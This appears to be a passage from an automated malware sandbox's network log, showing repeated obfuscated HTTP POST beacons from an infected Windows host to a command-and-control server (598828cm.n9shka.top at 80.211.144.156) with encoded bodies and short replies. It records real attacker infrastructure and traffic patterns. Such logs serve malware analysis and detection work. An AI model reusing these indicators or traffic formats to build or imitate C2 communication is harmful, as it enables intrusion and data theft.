                                                    Sep 14, 2024 12:54:11.478131056 CEST1012OUTData Raw: 56 54 59 5b 51 44 5f 5b 5e 5e 56 51 56 5f 54 59 57 53 5c 5c 57 5b 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY[QD_[^^VQV_TYWS\\W[UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]*?9X$647)Z",<]0+4\2()1%705Y/&F/%Z-9
                                                    Sep 14, 2024 12:54:11.836971045 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:11.944269896 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    69192.168.2.46283580.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:12.076733112 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:12.431459904 CEST1012OUTData Raw: 53 53 59 5e 54 46 5f 5e 5e 5e 56 51 56 5c 54 5e 57 56 5c 5b 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SSY^TF_^^^VQV\T^WV\[W]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<>$U!$=-5'3^#2: <2*:!05;&F/%Z-
                                                    Sep 14, 2024 12:54:12.740417004 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:12.872405052 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    70192.168.2.46283680.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:12.953854084 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    71192.168.2.46283780.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:13.001713991 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:13.353174925 CEST1012OUTData Raw: 56 56 59 5a 51 44 5a 59 5e 5e 56 51 56 58 54 53 57 52 5c 5a 57 5e 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VVYZQDZY^^VQVXTSWR\ZW^UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(?"'%6[=^!,4\'41:?_(02:=\##9]/&F/%Z-%
                                                    Sep 14, 2024 12:54:13.668298960 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:13.796420097 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    72192.168.2.46283880.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:13.975272894 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:14.321974039 CEST1012OUTData Raw: 56 54 59 58 54 41 5f 5e 5e 5e 56 51 56 52 54 53 57 50 5c 5a 57 51 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTYXTA_^^^VQVRTSWP\ZWQU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<<%_'"4?*=["<Y'<&*0+*?2)*4#8&F/%Z-
                                                    Sep 14, 2024 12:54:14.690608978 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:14.778211117 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    73192.168.2.46283980.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:14.904592037 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:15.259630919 CEST1012OUTData Raw: 56 54 5c 5c 51 41 5a 5f 5e 5e 56 51 56 53 54 5a 57 50 5c 58 57 5a 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VT\\QAZ_^^VQVSTZWP\XWZU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X+Z>&.&5;=-2]"Y 0(719 ?)'W')973;&F/%Z-
                                                    Sep 14, 2024 12:54:15.725864887 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:15.725910902 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:54:15.725940943 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    74192.168.2.46284080.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:15.859757900 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:16.212682962 CEST1012OUTData Raw: 53 50 59 5b 54 45 5a 53 5e 5e 56 51 56 5f 54 5c 57 53 5c 5c 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SPY[TEZS^^VQV_T\WS\\W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[<<=Y32T"$'(=2[5$' \%)(?)&)705,&F/%Z-9
                                                    Sep 14, 2024 12:54:16.542234898 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:16.672245979 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    75192.168.2.46284180.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:16.803400993 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:17.150063038 CEST1008OUTData Raw: 56 53 59 55 51 42 5a 5c 5e 5e 56 51 56 5b 54 52 57 5e 5c 5d 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYUQBZ\^^VQV[TRW^\]W_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?<!_0#7)=^6+$]1$()#V29\ U9/&F/%Z-
                                                    Sep 14, 2024 12:54:17.472237110 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:17.800736904 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:54:17.800916910 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    76192.168.2.46284280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:17.934931040 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    77192.168.2.46284380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:18.016719103 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1736
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:18.368782043 CEST1736OUTData Raw: 56 5f 59 59 54 47 5a 5c 5e 5e 56 51 56 5b 54 58 57 50 5c 5a 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V_YYTGZ\^^VQV[TXWP\ZW^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<$X>673>*!,;$(&:++Q&:)^ #2,&F/%Z-%
                                                    Sep 14, 2024 12:54:18.709918976 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:18.941698074 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 17 2a 34 3c 58 23 04 06 52 28 59 29 01 3e 31 3a 15 3e 2c 05 15 2a 37 26 03 3e 03 33 18 24 3f 28 15 24 21 35 16 27 24 2f 50 22 01 2e 5a 0c 1d 20 03 21 23 07 00 26 06 0c 1c 33 0f 21 01 20 22 33 5d 25 05 2a 03 35 3f 2a 11 3c 28 36 09 2a 1f 36 0a 2a 03 0c 08 2c 03 04 51 23 38 23 51 00 10 26 50 32 10 32 05 22 37 36 0f 3e 0f 3e 03 26 26 3e 57 27 5d 3d 04 31 06 0f 5d 27 20 2c 05 36 32 33 5a 24 3c 23 17 22 33 2d 56 3c 04 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #*4<X#R(Y)>1:>,*7&>3$?($!5'$/P".Z !#&3! "3]%*5?*<(6*6*,Q#8#Q&P22"76>>&&>W']=1]' ,623Z$<#"3-V<#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    78192.168.2.46284480.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:18.136878967 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:18.493808031 CEST1012OUTData Raw: 56 54 5c 58 54 42 5a 59 5e 5e 56 51 56 53 54 53 57 50 5c 58 57 58 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VT\XTBZY^^VQVSTSWP\XWXUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\($-5Q7)=-"<4$(X1Z++%\5^7%X;,&F/%Z-
                                                    Sep 14, 2024 12:54:18.808294058 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:19.007261038 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    79192.168.2.46284580.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:19.146568060 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:19.493916988 CEST1012OUTData Raw: 56 52 59 5f 51 41 5f 58 5e 5e 56 51 56 5d 54 5d 57 5e 5c 58 57 5e 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRY_QA_X^^VQV]T]W^\XW^UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<Z93>)!4#*["^"Y'';+&:[(_42Y 3Z;<&F/%Z-1
                                                    Sep 14, 2024 12:54:19.813664913 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:20.009752989 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    80192.168.2.46284680.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:20.144419909 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:20.493769884 CEST1012OUTData Raw: 56 54 5c 5f 54 45 5a 59 5e 5e 56 51 56 5d 54 52 57 53 5c 54 57 59 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VT\_TEZY^^VQV]TRWS\TWYU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,-$>T6$ X)-%5<?'\1:3[<_ '9"#;&F/%Z-1
                                                    Sep 14, 2024 12:54:20.905046940 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:20.956338882 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    81192.168.2.46284780.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:21.094047070 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:21.446917057 CEST1012OUTData Raw: 53 53 59 59 51 45 5f 5f 5e 5e 56 51 56 5a 54 53 57 5e 5c 54 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SSYYQE__^^VQVZTSW^\TWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%*?5^$.S!4(.!"<'01\#Y+'Q'*46.<&F/%Z--
                                                    Sep 14, 2024 12:54:21.779870033 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:21.916532040 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    82192.168.2.46284880.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:22.048103094 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:22.402472019 CEST1012OUTData Raw: 56 5f 59 59 54 45 5f 58 5e 5e 56 51 56 5c 54 5c 57 50 5c 55 57 5c 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V_YYTE_X^^VQV\T\WP\UW\U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?6'X.W!'[*-=#?4Z$+ '*+()19"#39/&F/%Z-
                                                    Sep 14, 2024 12:54:22.719101906 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:22.946315050 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    83192.168.2.46284980.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:23.074006081 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:23.431371927 CEST1012OUTData Raw: 56 57 59 55 54 44 5a 5b 5e 5e 56 51 56 5f 54 53 57 57 5c 55 57 5a 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VWYUTDZ[^^VQV_TSWW\UWZUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\*,"':T#$$*-#/03;(&( 2*&7[8&F/%Z-9
                                                    Sep 14, 2024 12:54:23.827820063 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:23.869651079 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    84192.168.2.46285080.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:23.953223944 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
